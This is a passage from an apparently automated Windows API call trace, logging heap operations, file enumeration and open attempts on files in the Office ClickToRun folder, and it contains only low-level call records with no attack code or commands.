Size=0x30) returned 0x4df18 [0081.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0081.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0081.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0081.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0081.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0081.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0081.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0081.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0081.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0081.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0081.812] AreFileApisANSI () returned 1 [0081.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0081.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85b20 [0081.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x85b20, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll") returned 75 [0081.812] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rcom.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d07d85, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d07d85, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb7179d00, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0xf34d8)) returned 1 [0081.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85b20 | out: hHeap=0x20000) returned 1 [0081.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0081.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0081.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0081.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.813] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d07d85, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d07d85, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xbd0d7e00, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x2a5e58, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="OfficeClickToRun.exe", cAlternateFileName="OFFICE~2.EXE")) returned 1 [0081.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0081.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0081.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0081.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0081.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0081.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0081.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0081.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0081.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0081.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0081.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0081.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0081.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0081.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0081.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0081.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0081.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0081.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0081.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0081.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0081.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0081.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0081.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0081.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0081.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0081.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0081.814] AreFileApisANSI () returned 1 [0081.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 79 [0081.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0081.814] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.814] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0081.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0081.814] AreFileApisANSI () returned 1 [0081.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0081.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x2e430 [0081.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe") returned 79 [0081.814] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0081.814] GetFileType (hFile=0x430) returned 0x1 [0081.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0081.814] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0081.815] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0081.815] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0081.815] CloseHandle (hObject=0x430) returned 1 [0081.815] AreFileApisANSI () returned 1 [0081.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0081.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x2e430 [0081.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe") returned 79 [0081.815] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0081.816] GetLastError () returned 0x20 [0081.816] GetLastError () returned 0x20 [0081.816] SetLastError (dwErrCode=0x20) [0081.816] GetLastError () returned 0x20 [0081.816] SetLastError (dwErrCode=0x20) [0081.816] GetLastError () returned 0x20 [0081.816] SetLastError (dwErrCode=0x20) [0081.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0081.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0081.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0081.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0081.816] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.816] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.816] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d542e1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d542e1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x3f141b52, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x12ae, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="OfficeUpdateSchedule.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0081.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0081.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0081.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0081.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0081.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0081.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0081.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0081.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0081.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0081.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0081.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0081.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0081.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0081.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0081.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0081.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0081.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0081.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0081.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0081.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0081.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0081.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0081.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0081.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0081.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0081.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0081.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x812a0 [0081.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0081.817] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.817] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.817] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.817] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x812a0 | out: hHeap=0x20000) returned 1 [0081.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0081.817] AreFileApisANSI () returned 1 [0081.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml", lpUsedDefaultChar=0x0) returned 83 [0081.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0081.817] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.817] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0081.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0081.818] AreFileApisANSI () returned 1 [0081.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0081.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0081.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x5f428, cchWideChar=83 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 83 [0081.818] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0081.818] GetFileType (hFile=0x430) returned 0x1 [0081.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0081.819] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0081.819] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0081.819] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0081.819] CloseHandle (hObject=0x430) returned 1 [0081.819] AreFileApisANSI () returned 1 [0081.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0081.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0081.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x5fd18, cchWideChar=83 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 83 [0081.819] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0081.819] GetFileType (hFile=0x430) returned 0x1 [0081.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0081.820] CloseHandle (hObject=0x430) returned 1 [0081.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0081.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0081.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0081.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0081.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0081.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0081.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0081.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0081.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0081.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0081.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0081.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0081.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0081.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0081.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0081.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0081.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0081.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0081.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0081.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0081.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0081.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0081.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0081.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0081.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0081.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0081.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0081.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0081.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0081.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0081.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0081.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0081.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0081.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0081.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0081.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0081.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0081.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0081.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0081.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0081.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0081.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0081.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0081.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0081.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0081.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0081.821] AreFileApisANSI () returned 1 [0081.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0081.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0081.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x5f798, cchWideChar=83 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 83 [0081.821] GetFileAttributesExW (in: lpFileName="C:\\Program 